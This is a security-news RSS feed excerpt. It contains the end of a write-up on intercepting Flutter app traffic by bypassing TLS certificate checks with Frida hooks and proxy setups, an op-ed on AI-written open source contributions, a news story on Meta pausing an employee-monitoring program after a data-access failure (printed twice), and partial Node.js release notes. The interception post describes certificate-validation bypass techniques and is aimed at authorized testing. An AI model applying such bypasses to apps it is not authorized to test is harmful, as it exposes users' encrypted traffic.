Log before assuming the scripts failed. “Failed to negotiate TLS connection” means the CA isn’t trusted, so run the scripts or use the bind mount. “Client request violates HTTP protocol” means invisible proxy isn’t on. If the Event Log shows nothing at all, traffic isn’t reaching Burp, and tcpdump will tell you where it’s actually going.</p><pre>adb shell su -c 'tcpdump -i any -n port 443'</pre><h3>To Wrap Up</h3><p>The two scripts cover the vast majority of Flutter apps on their own. The InAppWebViewClient hook is the part that was missing from everything else I found. If you’ve tried other bypass scripts and WebView traffic is still getting blocked, that subclass hook is probably why they didn’t work.</p><p>The rest of this post, iptables, bind mount, DNSChef, exists for edge cases. I needed those setups occasionally. You might not need them at all.</p><p>I spent three days on this. Hopefully you won’t have to.</p><h3>Credits and Prior Work</h3><p>These scripts are a compilation. The Flutter TLS patch comes from NVISOsecurity’s disable-flutter-tls-verification project. The Java-layer hooks — X509TrustManager, SSLContext, HostnameVerifier, WebViewClient — are standard Frida patterns that have been around for years and exist in various forms across dozens of public scripts. The InAppWebViewClient hook is the one addition I put together after hitting that specific problem myself and not finding it handled anywhere else.</p><p>I collected what was scattered, tested what actually worked, and put it in two files. That’s it.</p><p><em>Scripts: </em><a href="https://github.com/Ar-baaz/Universal-SSL-Bypass-Script-for-Flutter-Apps"><em>github.com/Ar-baaz/Universal-SSL-Bypass-Script-for-Flutter-Apps</em></a></p><p><em>DNSChef: </em><a href="https://github.com/iphelix/dnschef"><em>github.com/iphelix/dnschef</em></a></p><p><em>For authorized security testing or your own apps only.</em></p><img src="https://medium.com/_/stat?event=post.clientViewed&amp;referrerSource=full_rss&amp;postId=d3e9a4816818" width="1" height="1" alt=""><hr><p><a href="https://infosecwriteups.com/i-wasted-3-days-intercepting-a-flutter-app-heres-what-actually-works-d3e9a4816818">I Wasted 3 Days Intercepting a Flutter App. Here’s What Actually Works.</a> was originally published in <a href="https://infosecwriteups.com/">InfoSec Write-ups</a> on Medium, where people are continuing the conversation by highlighting and responding to this story.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Open source grapples with agentic coding]]></title>
<description><![CDATA[Unless you’ve been living under an old woodpile in your backyard, you have certainly seen how agentic coding is rocking the software development world. Things are happening fast and furious, and keeping up is practically a full-time job. 



The latest area that is catching the attention of devel...]]></description>
<link>https://tsecurity.de/de/3620720/ai-nachrichten/open-source-grapples-with-agentic-coding/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3620720/ai-nachrichten/open-source-grapples-with-agentic-coding/</guid>
<pubDate>Wed, 24 Jun 2026 11:03:53 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>Unless you’ve been living under an old woodpile in your backyard, you have certainly seen how agentic coding is rocking the software development world. Things are happening fast and furious, and keeping up is practically a full-time job. </p>



<p>The latest area that is catching the attention of developers is how agentic coding is affecting the open source community. The <a href="https://www.infoworld.com/article/2262355/what-is-open-source-software-open-source-and-foss-explained.html" data-type="link" data-id="https://www.infoworld.com/article/2262355/what-is-open-source-software-open-source-and-foss-explained.html">open source movement</a> has been defending the rights of folks to use, change, and contribute to software for many years. And of course, agentic coding is starting to become part of that process.</p>



<p>On the one hand, maintainers of open source projects rightfully are frustrated as they become overwhelmed with pull requests of dubious quality and usefulness being submitted by coding agents. On the other hand, <a href="https://world.hey.com/dhh/let-the-agents-democratize-open-source-9fd630a9">as David Heinemeier Hansson notes</a>, maintainers are starting to get a little snooty about accepting AI-written code, viewing it as somehow not worthy of being included. Some organizations have explicitly <a href="https://x.com/LundukeJournal/status/2060344714432241990?s=20" data-type="link" data-id="https://x.com/LundukeJournal/status/2060344714432241990?s=20">banned AI-generated submissions</a>.</p>



<p>I get that they don’t want AI slop overwhelming their input queues. But I think it is a huge mistake to ban AI-written code outright.</p>



<h2 class="wp-block-heading">Whose code?</h2>



<p>Before I dig deeper into that notion, it’s important to look at another issue that arises from all of this: Who actually owns the code that AI writes? </p>



<p>Copyright requires that a human produce the thing being copyrighted. If you prompt Claude Code with “Write me a CMS system” and then Claude writes you a CMS system that you check into a public GitHub repository unchanged, it’s not quite clear if that code is protected by copyright. However, if you prompt Claude Code with a specification and guidelines and then you work with Claude to refine the initial result, reviewing the code and making changes as part of an iterative process, then it could be argued that a human did produce that code. But it is not at all <a href="https://legallayer.substack.com/p/who-owns-the-claude-code-wrote">clear-cut legally</a>. (Please note that I am not a lawyer.)</p>



<p>The current thinking is that the result of accepting verbatim the output of a simple prompt is not copyrightable, and that no one actually owns the code — an interesting notion in and of itself. </p>



<p>But then the ethical question comes into play. If I find a bug in an open source project, I ask GitHub Copilot to fix it, and Copilot writes a clever and effective fix, then who cares who owns the code? Should a maintainer of the project reject such a pull request just because it was AI-generated? That seems silly to me, yet it is happening today. </p>



<h2 class="wp-block-heading">Our code</h2>



<p>There is, too, the issue of license compliance for AI-generated code. As a general rule, LLMs generate code rather than copying it. They don’t copy and paste code directly from repositories. However, there have been cases where AI-produced code has resembled open source code so closely that the claim could be made that it is a copy. If this happens with <a href="https://opensource.org/license/gpl-3.0">GPL</a> code, it could be a violation of the license to use it without the receiving code base being “infected.” Open source maintainers naturally should be concerned about this happening.</p>



<p>In the end, an open source maintainer should care about the quality and license compliance of submissions, not how those submissions were derived. Gatekeeping based on the source of code doesn’t seem like a good path towards project success. Good code is good code, no matter where it comes from.</p>



<p>Agentic coding is here, and the open source community needs to realize — and embrace — that inevitability.</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Meta pauses employee monitoring program after data protections fail]]></title>
<description><![CDATA[An extensive program at Meta to gather a wide range of data from employees to train its AI model has been frozen after employees reportedly broke through its guardrails and accessed restricted data, and then did so again after Meta claimed to have fixed the vulnerability.



Whether or not the da...]]></description>
<link>https://tsecurity.de/de/3619974/it-security-nachrichten/meta-pauses-employee-monitoring-program-after-data-protections-fail/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3619974/it-security-nachrichten/meta-pauses-employee-monitoring-program-after-data-protections-fail/</guid>
<pubDate>Wed, 24 Jun 2026 03:37:40 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>An extensive program at Meta to gather a wide range of data from employees to train its AI model has been frozen after employees reportedly broke through its guardrails and accessed restricted data, and then did so again after Meta claimed to have fixed the vulnerability.</p>



<p>Whether or not <a href="https://www.computerworld.com/article/4161929/meta-to-track-employee-keystrokes-screen-activity-to-train-ai-agents.html" target="_blank">the data collection</a> by the $201 billion owner of Facebook was a good idea, analysts argue that the data protections deployed were woefully inadequate, given the extreme sensitive nature of the collected data.</p>



<p>“Meta had the resources to get it right, and yet they failed exponentially,” said <a href="https://acceligence.com/talent/profiles/karianne-michelle/" target="_blank" rel="noreferrer noopener">Karianne Michelle</a>, a director with consulting firm Acceligence. “That is what it looks like when the policy decision and the technical execution are happening in two different rooms that are not fully in sync. It is the kind of gap you see often enough at organizations under structural strain.”</p>



<p><a href="https://www.infotech.com/profiles/fritz-jean-louis" target="_blank" rel="noreferrer noopener">Fritz Jean-Louis</a>, principal cybersecurity advisor at Info-Tech Research Group,  agreed.</p>



<p>“What we just observed from the Meta story is a classic failure mode in AI-era data strategy: collecting high-risk telemetry without equally mature access controls,” Jean-Louis said. “At that scale, a single misconfiguration turns internal data into a systemic exposure.”</p>



<p>The story, <a href="https://www.wired.com/story/meta-pauses-employee-tracking-program-following-internal-security-breach/" target="_blank" rel="noreferrer noopener">detailed in a <em>Wired </em>report</a>, involved a program that Meta rolled out in April called the Model Compatibility Initiative (MCI), which collects computer inputs such as mouse movements, click locations, and keystrokes, as well as screen content, the story said. Meta employees were initially not allowed to opt out. </p>



<p>The data collected included full prompts and transcriptions, private conversations, people and performance data, Wired said, adding, “Meta executives have repeatedly defended the data-gathering project, saying it was necessary to train AI systems to operate computer software the way humans do, and that employees were the best examples for the artificial intelligence to learn from.”</p>



<p>Wired also quoted Stephane Kasriel, a Meta vice president overseeing AI research, who saying that the company discovered that unauthorized employees were found to have accessed MCI data on June 18, and that the hole was closed “within four hours.” But, he added, “ the initial fix didn’t stick, and access to the data had to be further locked down.”</p>



<p>In an email statement shared with CSO Online, Meta confirmed that the program was being halted for the time being. “We have carefully designed this program with privacy safeguards, and while we have no indication at this time that any data was improperly accessed by Meta employees, we’re pausing it while we investigate,” Meta said. </p>



<h2 class="wp-block-heading">A ‘liability surface’</h2>



<p>Analysts, consultants, and industry practitioners said they were more concerned about the inadequate protections than the underlying data exposure.</p>



<p><a href="https://www.linkedin.com/in/carmi/" target="_blank" rel="noreferrer noopener">Carmi Levy</a>, an independent technology analyst, said that although there should be concerns about Meta’s “Orwellian oversight of workers’ keystrokes and mouse movements,” the bigger issue is the paper-thin protections that it used to protect that data.</p>



<p>“As creepy as MCI was and is, the reason Meta has hit the pause button has nothing to do with the moral and ethical fuzziness of everyday employee surveillance, and everything to do with its failure to secure the data it collected in the process,” Levy said. “Conceivably, it will resume monitoring and data collection once it fully understands how highly sensitive data, such as employees’ private conversations, performance data, and transcriptions, ended up being inadvertently shared with the entire workforce.”</p>



<p>One of the critical background issues is that while the data collected was highly sensitive, it was not, from a strict compliance law perspective, PII (personally identifiable information). That distinction might have lulled Meta into a false sense of security and convinced it that the data did not merit strong protections. </p>



<p>“I think companies can get a little too comfortable saying, ‘Well, it’s not PII,’ as if that makes the data low-risk,” said <a href="https://www.linkedin.com/in/tomfindling/" target="_blank" rel="noreferrer noopener">Tom Findling</a>, CEO of Conifers.ai. “But internal prompts, transcripts, chats, data tables, and performance notes can tell you a lot about how a company works, what it’s building and where things are messy or exposed. That’s sensitive, even if it’s not someone’s Social Security number.”</p>



<p>Findling argued that Meta executives “wanted to pretend that they didn’t understand” how sensitive the collected data was, and that was their excuse for why they should not have to protect it sufficiently. “There is no doubt that Meta did not tag this at an appropriate risk level,” he said.</p>



<p>Info-Tech’s Jean-Louis took particular umbrage at the particulars of the collected data. </p>



<p>“Employee behavioral data, such as keystrokes, screenshots, and usage patterns, is effectively sensitive by default. If you’re using it to train AI, you have to treat it like production secrets, not analytics exhaust,” Jean-Louis said. “When thousands of internal tables are broadly accessible, you have a liability surface rather than a data platform. Trust nowadays is a security control. Once employees believe their data is overcollected or underprotected, you introduce both insider risk and reputational damage at the same time.”</p>



<p>Acceligence’s Michelle echoed Jean-Louis’ concerns.</p>



<p>“The data Meta exposed is not the real risk. Security policy only works if people believe it, and belief is exactly what is now in question,” Michelle said. “That gap is where incidents like this one do their damage: once employees stop trusting what leadership says about their own data, the doubt follows every policy that comes next, producing workarounds, quiet noncompliance, and employees who stop raising flags.”</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Meta pauses employee monitoring program after data protections fail]]></title>
<description><![CDATA[An extensive program at Meta to gather a wide range of data from employees to train its AI model has been frozen after employees reportedly broke through its guardrails and accessed restricted data, and then did so again after Meta claimed to have fixed the vulnerability.



Whether or not the da...]]></description>
<link>https://tsecurity.de/de/3619967/it-nachrichten/meta-pauses-employee-monitoring-program-after-data-protections-fail/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3619967/it-nachrichten/meta-pauses-employee-monitoring-program-after-data-protections-fail/</guid>
<pubDate>Wed, 24 Jun 2026 03:32:31 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>An extensive program at Meta to gather a wide range of data from employees to train its AI model has been frozen after employees reportedly broke through its guardrails and accessed restricted data, and then did so again after Meta claimed to have fixed the vulnerability.</p>



<p>Whether or not <a href="https://www.computerworld.com/article/4161929/meta-to-track-employee-keystrokes-screen-activity-to-train-ai-agents.html" target="_blank">the data collection</a> by the $201 billion owner of Facebook was a good idea, analysts argue that the data protections deployed were woefully inadequate, given the extreme sensitive nature of the collected data.</p>



<p>“Meta had the resources to get it right, and yet they failed exponentially,” said <a href="https://acceligence.com/talent/profiles/karianne-michelle/" target="_blank" rel="noreferrer noopener">Karianne Michelle</a>, a director with consulting firm Acceligence. “That is what it looks like when the policy decision and the technical execution are happening in two different rooms that are not fully in sync. It is the kind of gap you see often enough at organizations under structural strain.”</p>



<p><a href="https://www.infotech.com/profiles/fritz-jean-louis" target="_blank" rel="noreferrer noopener">Fritz Jean-Louis</a>, principal cybersecurity advisor at Info-Tech Research Group,  agreed.</p>



<p>“What we just observed from the Meta story is a classic failure mode in AI-era data strategy: collecting high-risk telemetry without equally mature access controls,” Jean-Louis said. “At that scale, a single misconfiguration turns internal data into a systemic exposure.”</p>



<p>The story, <a href="https://www.wired.com/story/meta-pauses-employee-tracking-program-following-internal-security-breach/" target="_blank" rel="noreferrer noopener">detailed in a <em>Wired </em>report</a>, involved a program that Meta rolled out in April called the Model Compatibility Initiative (MCI), which collects computer inputs such as mouse movements, click locations, and keystrokes, as well as screen content, the story said. Meta employees were initially not allowed to opt out. </p>



<p>The data collected included full prompts and transcriptions, private conversations, people and performance data, Wired said, adding, “Meta executives have repeatedly defended the data-gathering project, saying it was necessary to train AI systems to operate computer software the way humans do, and that employees were the best examples for the artificial intelligence to learn from.”</p>



<p>Wired also quoted Stephane Kasriel, a Meta vice president overseeing AI research, who saying that the company discovered that unauthorized employees were found to have accessed MCI data on June 18, and that the hole was closed “within four hours.” But, he added, “ the initial fix didn’t stick, and access to the data had to be further locked down.”</p>



<p>In an email statement, Meta confirmed that the program was being halted for the time being. “We have carefully designed this program with privacy safeguards, and while we have no indication at this time that any data was improperly accessed by Meta employees, we’re pausing it while we investigate,” Meta said. </p>



<h2 class="wp-block-heading">A ‘liability surface’</h2>



<p>Analysts, consultants, and industry practitioners said they were more concerned about the inadequate protections than the underlying data exposure.</p>



<p><a href="https://www.linkedin.com/in/carmi/" target="_blank" rel="noreferrer noopener">Carmi Levy</a>, an independent technology analyst, said that although there should be concerns about Meta’s “Orwellian oversight of workers’ keystrokes and mouse movements,” the bigger issue is the paper-thin protections that it used to protect that data.</p>



<p>“As creepy as MCI was and is, the reason Meta has hit the pause button has nothing to do with the moral and ethical fuzziness of everyday employee surveillance, and everything to do with its failure to secure the data it collected in the process,” Levy said. “Conceivably, it will resume monitoring and data collection once it fully understands how highly sensitive data, such as employees’ private conversations, performance data, and transcriptions, ended up being inadvertently shared with the entire workforce.”</p>



<p>One of the critical background issues is that while the data collected was highly sensitive, it was not, from a strict compliance law perspective, PII (personally identifiable information). That distinction might have lulled Meta into a false sense of security and convinced it that the data did not merit strong protections. </p>



<p>“I think companies can get a little too comfortable saying, ‘Well, it’s not PII,’ as if that makes the data low-risk,” said <a href="https://www.linkedin.com/in/tomfindling/" target="_blank" rel="noreferrer noopener">Tom Findling</a>, CEO of Conifers.ai. “But internal prompts, transcripts, chats, data tables, and performance notes can tell you a lot about how a company works, what it’s building and where things are messy or exposed. That’s sensitive, even if it’s not someone’s Social Security number.”</p>



<p>Findling argued that Meta executives “wanted to pretend that they didn’t understand” how sensitive the collected data was, and that was their excuse for why they should not have to protect it sufficiently. “There is no doubt that Meta did not tag this at an appropriate risk level,” he said.</p>



<p>Info-Tech’s Jean-Louis took particular umbrage at the particulars of the collected data. </p>



<p>“Employee behavioral data, such as keystrokes, screenshots, and usage patterns, is effectively sensitive by default. If you’re using it to train AI, you have to treat it like production secrets, not analytics exhaust,” Jean-Louis said. “When thousands of internal tables are broadly accessible, you have a liability surface rather than a data platform. Trust nowadays is a security control. Once employees believe their data is overcollected or underprotected, you introduce both insider risk and reputational damage at the same time.”</p>



<p>Acceligence’s Michelle echoed Jean-Louis’ concerns.</p>



<p>“The data Meta exposed is not the real risk. Security policy only works if people believe it, and belief is exactly what is now in question,” Michelle said. “That gap is where incidents like this one do their damage: once employees stop trusting what leadership says about their own data, the doubt follows every policy that comes next, producing workarounds, quiet noncompliance, and employees who stop raising flags.”</p>



<p><em>This article originally appeared on <a href="https://www.csoonline.com/article/4188623/meta-pauses-employee-monitoring-program-after-data-protections-fail.html" target="_blank">CSOonline</a>.</em></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[2026-06-23, Version 24.18.0 'Krypton' (LTS), @richardlau prepared by @sxa]]></title>
<description><![CDATA[Notable Changes

[e07e7a31e1] - crypto: update root certificates to NSS 3.123.1 (Node.js GitHub Bot) #63527
[44c8ebcbd6] - http: avoid stream listeners on idle agent sockets (Matteo Collina) #64004
[d3ef4122ee] - (SEMVER-MINOR) buffer: increase Buffer.poolSize default to 64 KiB (Matteo Collina) #...]]></description>
<link>https://tsecurity.de/de/3619855/downloads/2026-06-23-version-24180-krypton-lts-richardlau-prepared-by-sxa/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3619855/downloads/2026-06-23-version-24180-krypton-lts-richardlau-prepared-by-sxa/</guid>
<pubDate>Wed, 24 Jun 2026 01:16:44 +0200</pubDate>
<category>💾 Downloads</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<h3>Notable Changes</h3>
<ul>
<li>[<a href="https://github.com/nodejs/node/commit/e07e7a31e1"><code>e07e7a31e1</code></a>] - <strong>crypto</strong>: update root certificates to NSS 3.123.1 (Node.js GitHub Bot) <a href="https://github.com/nodejs/node/pull/63527" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63527/hovercard">#63527</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/44c8ebcbd6"><code>44c8ebcbd6</code></a>] - <strong>http</strong>: avoid stream listeners on idle agent sockets (Matteo Collina) <a href="https://github.com/nodejs/node/pull/64004" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/64004/hovercard">#64004</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/d3ef4122ee"><code>d3ef4122ee</code></a>] - <strong>(SEMVER-MINOR)</strong> <strong>buffer</strong>: increase Buffer.poolSize default to 64 KiB (Matteo Collina) <a href="https://github.com/nodejs/node/pull/63597" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63597/hovercard">#63597</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/bb2857b85a"><code>bb2857b85a</code></a>] - <strong>(SEMVER-MINOR)</strong> <strong>crypto</strong>: align key argument names in docs and error messages (Filip Skokan) <a href="https://github.com/nodejs/node/pull/62527" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/62527/hovercard">#62527</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/b9d5e87880"><code>b9d5e87880</code></a>] - <strong>(SEMVER-MINOR)</strong> <strong>crypto</strong>: accept key data in crypto.diffieHellman() and cleanup DH jobs (Filip Skokan) <a href="https://github.com/nodejs/node/pull/62527" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/62527/hovercard">#62527</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/ccd756d61e"><code>ccd756d61e</code></a>] - <strong>(SEMVER-MINOR)</strong> <strong>crypto</strong>: add TurboSHAKE and KangarooTwelve Web Cryptography algorithms (Filip Skokan) <a href="https://github.com/nodejs/node/pull/62183" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/62183/hovercard">#62183</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/4c9251fc09"><code>4c9251fc09</code></a>] - <strong>(SEMVER-MINOR)</strong> <strong>http</strong>: add writeInformation to send arbitrary 1xx status codes (Tim Perry) <a href="https://github.com/nodejs/node/pull/63155" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63155/hovercard">#63155</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/8c989ec4a3"><code>8c989ec4a3</code></a>] - <strong>(SEMVER-MINOR)</strong> <strong>inspector</strong>: expose precise coverage start to JS runtime (sangwook) <a href="https://github.com/nodejs/node/pull/63079" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63079/hovercard">#63079</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/3f54c8ba32"><code>3f54c8ba32</code></a>] - <em><strong>Revert</strong></em> "<strong>stream</strong>: noop pause/resume on destroyed streams" (Stewart X Addison) <a href="https://github.com/nodejs/node/pull/63834" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63834/hovercard">#63834</a></li>
</ul>
<h3>Commits</h3>
<ul>
<li>[<a href="https://github.com/nodejs/node/commit/d3ef4122ee"><code>d3ef4122ee</code></a>] - <strong>(SEMVER-MINOR)</strong> <strong>buffer</strong>: increase Buffer.poolSize default to 64 KiB (Matteo Collina) <a href="https://github.com/nodejs/node/pull/63597" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63597/hovercard">#63597</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/9ff36e40f0"><code>9ff36e40f0</code></a>] - <strong>build</strong>: add --enable-all-experimentals build flag (Paolo Insogna) <a href="https://github.com/nodejs/node/pull/62755" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/62755/hovercard">#62755</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/7c22ee23aa"><code>7c22ee23aa</code></a>] - <strong>build</strong>: def <code>NODE_USE_NODE_CODE_CACHE</code> only used in node_mksnapshot (Chengzhong Wu) <a href="https://github.com/nodejs/node/pull/63588" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63588/hovercard">#63588</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/2551abdb4a"><code>2551abdb4a</code></a>] - <strong>build,win</strong>: enable x64 PGO (Stefan Stojanovic) <a href="https://github.com/nodejs/node/pull/62761" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/62761/hovercard">#62761</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/e8a55ce9b1"><code>e8a55ce9b1</code></a>] - <strong>crypto</strong>: strengthen argument CHECKs in TurboSHAKE (Tobias Nießen) <a href="https://github.com/nodejs/node/pull/62763" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/62763/hovercard">#62763</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/ae61cd68f3"><code>ae61cd68f3</code></a>] - <strong>crypto</strong>: harden WebCrypto against prototype pollution (Filip Skokan) <a href="https://github.com/nodejs/node/pull/63363" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63363/hovercard">#63363</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/3d05a1d396"><code>3d05a1d396</code></a>] - <strong>crypto</strong>: pass CryptoKey handles to KDF jobs (Filip Skokan) <a href="https://github.com/nodejs/node/pull/63363" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63363/hovercard">#63363</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/f9d10a3f6b"><code>f9d10a3f6b</code></a>] - <strong>crypto</strong>: remove async from WebCrypto methods (Filip Skokan) <a href="https://github.com/nodejs/node/pull/63363" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63363/hovercard">#63363</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/e431d93e9e"><code>e431d93e9e</code></a>] - <strong>crypto</strong>: add WebCrypto CryptoJob mode (Filip Skokan) <a href="https://github.com/nodejs/node/pull/63363" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63363/hovercard">#63363</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/56e2505e48"><code>56e2505e48</code></a>] - <strong>crypto</strong>: wire ML-DSA and ML-KEM for use when using BoringSSL (Filip Skokan) <a href="https://github.com/nodejs/node/pull/63255" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63255/hovercard">#63255</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/3bac77f2a8"><code>3bac77f2a8</code></a>] - <strong>crypto</strong>: wire ChaCha20-Poly1305 in Web Cryptography when using BoringSSL (Filip Skokan) <a href="https://github.com/nodejs/node/pull/63255" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63255/hovercard">#63255</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/1bff901b09"><code>1bff901b09</code></a>] - <strong>crypto</strong>: wire AES-KW in Web Cryptography when using BoringSSL (Filip Skokan) <a href="https://github.com/nodejs/node/pull/63255" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63255/hovercard">#63255</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/4433fca3df"><code>4433fca3df</code></a>] - <strong>crypto</strong>: harden CryptoKey algorithm slots (Filip Skokan) <a href="https://github.com/nodejs/node/pull/63111" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63111/hovercard">#63111</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/b5cf01217a"><code>b5cf01217a</code></a>] - <strong>crypto</strong>: harden KeyObject internal slots (Filip Skokan) <a href="https://github.com/nodejs/node/pull/63111" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63111/hovercard">#63111</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/ce84aef37d"><code>ce84aef37d</code></a>] - <strong>crypto</strong>: add guards and adjust tests for BoringSSL (Filip Skokan) <a href="https://github.com/nodejs/node/pull/62883" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/62883/hovercard">#62883</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/26781689b0"><code>26781689b0</code></a>] - <strong>crypto</strong>: reject duplicate ML-KEM JWK key_ops (Filip Skokan) <a href="https://github.com/nodejs/node/pull/62905" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/62905/hovercard">#62905</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/aeea8f4970"><code>aeea8f4970</code></a>] - <strong>crypto</strong>: add JWK support for ML-KEM and SLH-DSA key types (Filip Skokan) <a href="https://github.com/nodejs/node/pull/62706" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/62706/hovercard">#62706</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/407cf91656"><code>407cf91656</code></a>] - <strong>crypto</strong>: guard against size_t overflow on experimental 32-bit arch (Filip Skokan) <a href="https://github.com/nodejs/node/pull/62626" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/62626/hovercard">#62626</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/bb2857b85a"><code>bb2857b85a</code></a>] - <strong>(SEMVER-MINOR)</strong> <strong>crypto</strong>: align key argument names in docs and error messages (Filip Skokan) <a href="https://github.com/nodejs/node/pull/62527" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/62527/hovercard">#62527</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/b9d5e87880"><code>b9d5e87880</code></a>] - <strong>(SEMVER-MINOR)</strong> <strong>crypto</strong>: accept key data in crypto.diffieHellman() and cleanup DH jobs (Filip Skokan) <a href="https://github.com/nodejs/node/pull/62527" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/62527/hovercard">#62527</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/b46d52b283"><code>b46d52b283</code></a>] - <strong>crypto</strong>: unify asymmetric key import through KeyObjectHandle::Init (Filip Skokan) <a href="https://github.com/nodejs/node/pull/62499" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/62499/hovercard">#62499</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/ccd756d61e"><code>ccd756d61e</code></a>] - <strong>(SEMVER-MINOR)</strong> <strong>crypto</strong>: add TurboSHAKE and KangarooTwelve Web Cryptography algorithms (Filip Skokan) <a href="https://github.com/nodejs/node/pull/62183" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/62183/hovercard">#62183</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/e07e7a31e1"><code>e07e7a31e1</code></a>] - <strong>crypto</strong>: update root certificates to NSS 3.123.1 (Node.js GitHub Bot) <a href="https://github.com/nodejs/node/pull/63527" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63527/hovercard">#63527</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/61826df455"><code>61826df455</code></a>] - <strong>crypto</strong>: coerce -0 keylen to +0 in pbkdf2 and scrypt (Jordan Harband) <a href="https://github.com/nodejs/node/pull/63531" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63531/hovercard">#63531</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/16d2fd3c07"><code>16d2fd3c07</code></a>] - <strong>crypto</strong>: align verifyOneShot accepted types (Anshika Jain) <a href="https://github.com/nodejs/node/pull/63280" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63280/hovercard">#63280</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/3b8330deda"><code>3b8330deda</code></a>] - <strong>crypto</strong>: improve system certificate enumeration logic on macOS (Robo) <a href="https://github.com/nodejs/node/pull/62576" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/62576/hovercard">#62576</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/141de35399"><code>141de35399</code></a>] - <strong>debugger</strong>: add --help to <code>node inspect</code> and improve docs (Joyee Cheung) <a href="https://github.com/nodejs/node/pull/63201" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63201/hovercard">#63201</a></li>
